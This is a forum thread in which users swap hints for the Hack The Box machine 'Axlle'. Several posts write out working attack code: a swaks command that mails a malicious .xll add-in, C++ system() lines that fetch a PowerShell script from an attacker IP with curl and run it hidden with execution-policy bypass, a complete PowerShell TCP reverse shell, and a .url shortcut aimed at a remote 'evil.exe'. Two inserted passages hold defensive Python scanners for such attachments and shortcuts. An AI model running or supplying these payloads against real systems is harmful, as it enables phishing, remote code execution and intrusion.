HTB - Axlle
by Sqweez - Saturday June 22, 2024 at 06:57 PM
#41
(Jun 23, 2024, 03:06 AM)markg34 Wrote:
(Jun 23, 2024, 03:02 AM)saoBFo Wrote:
(Jun 23, 2024, 02:20 AM)standby123 Wrote:
(Jun 23, 2024, 02:01 AM)jeff1998 Wrote: Any hints for low user?

From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.

don't know what to do next. lol

Search in the folder C:\Program Files (x86)\hMailServer

The hash in the hMailServer.INI is not crackable with rockyou

Yeah hmailer, there's a decrypt vbs in addons you can use. I modified it and decrypted the pass from the INI

https://github.com/GitMirar/hMailDatabas...dDecrypter

can be used for decrypting the encrypted Blowfish password from hMailServer.INI. Only the sqlserver hash is crackable.
Reply
#42
(Jun 23, 2024, 03:56 AM)saoBFo Wrote:
(Jun 23, 2024, 03:38 AM)maggi Wrote:
(Jun 23, 2024, 03:22 AM)saoBFo Wrote:
(Jun 23, 2024, 03:10 AM)standby123 Wrote:
(Jun 23, 2024, 03:02 AM)saoBFo Wrote: The hash in the hMailServer.INI is not crackable with rockyou

Hash, what hash? Search in C:\Program Files (x86)\hMailServer\Data


lnk in C:\inetpub\testing is not working, which type of "web shortcuts" is working for you?

I was just about to start dropping stuff in there, what did you use as your lnk file?

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\inetpub\testing\test.lnk")
$lnk.TargetPath = "PATH to payload"
$lnk.Save()

But, this is not working..
.lnk injection, I saw this in mist.htb

(Jun 23, 2024, 03:58 AM)fuckhackthebox Wrote:
(Jun 23, 2024, 03:54 AM)osamy7593 Wrote:
(Jun 23, 2024, 03:50 AM)fuckhackthebox Wrote:
(Jun 23, 2024, 03:43 AM)osamy7593 Wrote:
(Jun 23, 2024, 03:41 AM)fuckhackthebox Wrote: figured

seems to work for some but not others

done it 100 times now with no response

tried encoded ps like you suggested and still nothing

so weird
Bro maybe u need to --server 10.10.11.21 --port 25

pretty sure my swaks command is okay but appreciate the sanity check

swaks --to accounts@axlle.htb --from ihatethisbox@fuckhtb.htb --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @test.xll

my vip ip for the box is different but ye

and that test.xll works locally

Maybe it's an internet issue. Close your VM and try again; if not, download xllpoc, go to dllmain.cpp and put the code there. After that, open xllpoc.sln in VS and build it; the .dll will be created. Rename it to .xll, and after that send it.

appreciate the advice man but ive done that

i even just swapped vpn regions and everything and still nothing

i give up for the night lmao

No problem bro try again tomorrow u will do it

Reply
#43
(Jun 23, 2024, 04:04 AM)gihimlek Wrote:
(Jun 23, 2024, 03:58 AM)fuckhackthebox Wrote:
(Jun 23, 2024, 03:54 AM)osamy7593 Wrote:
(Jun 23, 2024, 03:50 AM)fuckhackthebox Wrote:
(Jun 23, 2024, 03:43 AM)osamy7593 Wrote: Bro maybe u need to --server 10.10.11.21 --port 25

pretty sure my swaks command is okay but appreciate the sanity check

swaks --to accounts@axlle.htb --from ihatethisbox@fuckhtb.htb --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @test.xll

my vip ip for the box is different but ye

and that test.xll works locally

Maybe it's an internet issue. Close your VM and try again; if not, download xllpoc, go to dllmain.cpp and put the code there. After that, open xllpoc.sln in VS and build it; the .dll will be created. Rename it to .xll, and after that send it.

appreciate the advice man but ive done that

i even just swapped vpn regions and everything and still nothing

i give up for the night lmao

Same ....

couple of things:

1. swaks that I've used and worked -

swaks --to accounts@axlle.htb --from it@axlle.htb --header "Subject: ws" --body "check" --attach @ws.xll

2. PowerShell execution - made the rev shell work with the addition of a command in the xll example cpp file

system ("curl http://<IP>:<PORT>/revsh.ps1 | powershell -nop -W hidden -noni -ep bypass -f  -");

revsh.ps1

$TCPClient = New-Object Net.Sockets.TCPClient('<IP>', <PORT>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()

Replace <IP>,<PORT> with your IP, PORT

cheers
Reply
#44
(Jun 23, 2024, 04:12 AM)bmoon10 Wrote:
(Jun 23, 2024, 04:04 AM)gihimlek Wrote:
(Jun 23, 2024, 03:58 AM)fuckhackthebox Wrote:
(Jun 23, 2024, 03:54 AM)osamy7593 Wrote:
(Jun 23, 2024, 03:50 AM)fuckhackthebox Wrote: pretty sure my swaks command is okay but appreciate the sanity check

swaks --to accounts@axlle.htb --from ihatethisbox@fuckhtb.htb --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @test.xll

my vip ip for the box is different but ye

and that test.xll works locally

Maybe it's an internet issue. Close your VM and try again; if not, download xllpoc, go to dllmain.cpp and put the code there. After that, open xllpoc.sln in VS and build it; the .dll will be created. Rename it to .xll, and after that send it.

appreciate the advice man but ive done that

i even just swapped vpn regions and everything and still nothing

i give up for the night lmao

Same ....

couple of things:

1. swaks that I've used and worked -

swaks --to accounts@axlle.htb --from it@axlle.htb --header "Subject: ws" --body "check" --attach @ws.xll

2. PowerShell execution - I made it work with two steps in the cpp file

system("curl http://<IP>:<PORT>/revsh.ps1 -o %TEMP%\revsh.ps1");
system("powershell -nop -W hidden -noni -ep bypass -f %TEMP%\revsh.ps1");

revsh.ps1

$TCPClient = New-Object Net.Sockets.TCPClient('<IP>', <PORT>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()

Replace <IP>,<PORT> with your IP, PORT

cheers

So basically you are creating a cpp file with system commands and then attaching it to the xll file?
Reply
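Seen from the receiving side, the delivery path in the posts above (an .xll add-in, which is a native DLL, mailed as an attachment) can be screened at the mail gateway. The following is an added example, not code from the thread; the function names and the blocked-extension set are assumptions, and the PE bytes are a constructed stub.

```python
import email
from email import policy
from email.message import EmailMessage

BLOCKED_EXT = {".xll", ".dll", ".exe"}  # assumption: local attachment policy


def is_pe(data: bytes) -> bool:
    """True if data starts with 'MZ' and has 'PE\\0\\0' at the e_lfanew offset."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    off = int.from_bytes(data[0x3C:0x40], "little")
    return data[off:off + 4] == b"PE\0\0"


def scan_message(raw: bytes) -> list:
    """Return (filename, reason) for every attachment that should be quarantined."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        data = part.get_payload(decode=True) or b""
        ext = name[name.rfind("."):] if "." in name else ""
        if is_pe(data):  # content check catches renamed add-ins
            findings.append((name, "PE image content"))
        elif ext in BLOCKED_EXT:
            findings.append((name, "blocked extension"))
    return findings


def build_sample(filename: str, payload: bytes) -> bytes:
    """Build a constructed test message carrying one attachment."""
    m = EmailMessage()
    m["From"], m["To"], m["Subject"] = "a@example.test", "b@example.test", "constructed"
    m.set_content("body")
    m.add_attachment(payload, maintype="application",
                     subtype="octet-stream", filename=filename)
    return m.as_bytes()


# Constructed PE stub: 'MZ', e_lfanew = 0x40 at offset 0x3C, then 'PE\0\0'.
FAKE_PE = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0"

if __name__ == "__main__":
    print(scan_message(build_sample("ws.xll", FAKE_PE)))
```

Checking content before the extension means an add-in renamed to a harmless-looking name is still caught.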
#45
anyone have a tip on how to move on from gideon after finding the hmail creds?
Reply
#46
Any hint for root? Is it DLL hijack for kbfiltr?
Reply
#47
(Jun 23, 2024, 05:09 AM)maggi Wrote: anyone have a tip on how to move on from gideon after finding the hmail creds?

Didn't use those creds. But there is a hint in an email in the Data folder.
Something like this worked for me
$url = "file:////10.10.x.x/share/evil.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
Reply
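For defenders, the shortcut shown in the post above is easy to hunt for: an Internet Shortcut whose fields point at a remote host over file:// or UNC. The following is an added example, not code from the thread; function names are assumptions and the sample uses a documentation-range address.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

KEYS = ("url", "iconfile", "workingdirectory")  # fields that can carry a path

# Constructed sample; 192.0.2.0/24 is a documentation range.
SAMPLE = "[InternetShortcut]\r\nURL=file:////192.0.2.10/share/tool.exe\r\n"


def parse_shortcut(text: str) -> dict:
    """Parse the [InternetShortcut] section of a .url file into a lowercase-key dict."""
    fields, in_section = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_section = line.lower() == "[internetshortcut]"
        elif in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def remote_host(value: str):
    """Return the remote host named by a file:// URL or UNC path, else None."""
    unc = re.match(r"^[\\/]{2}([^\\/?]+)[\\/]", value)
    if unc:
        return unc.group(1)
    if value.lower().startswith("file:"):
        parsed = urlparse(value)
        if parsed.netloc:  # file://host/share form
            return parsed.netloc
        inner = re.match(r"^/{2,}([^/]+)/", parsed.path)  # file:////host/share form
        return inner.group(1) if inner else None
    return None


def scan_dir(root: str) -> list:
    """Return (file name, field, host) for each shortcut field that targets a remote host."""
    hits = []
    for path in sorted(Path(root).rglob("*.url")):
        fields = parse_shortcut(path.read_text(errors="replace"))
        for key in KEYS:
            host = remote_host(fields.get(key, ""))
            if host:
                hits.append((path.name, key, host))
    return hits
```

Run `scan_dir` over any folder where users or services open dropped files; a hit on `iconfile` matters as much as one on `url`, since both make the client reach out to the named host.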
#48
(Jun 23, 2024, 06:32 AM)ritualist Wrote:
(Jun 23, 2024, 05:09 AM)maggi Wrote: anyone have a tip on how to move on from gideon after finding the hmail creds?

Didn't use those creds. But there is a hint in an email in the Data folder.
Something like this worked for me
$url = "file:////10.10.x.x/share/evil.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent

Good looks I didn't think of that!
I knew it was a link but I always forget I can share a share
Reply
#49
After getting a shell, how to get the user flag?
Reply
#50
(Jun 23, 2024, 07:28 AM)game95 Wrote: After getting a shell, how to get the user flag?

In C:\Program Files (x86)\hMailServer you have some config files with a password hash. Use https://github.com/GitMirar/hMailDatabas...dDecrypter to unhash the password for the MSSQL database
Reply

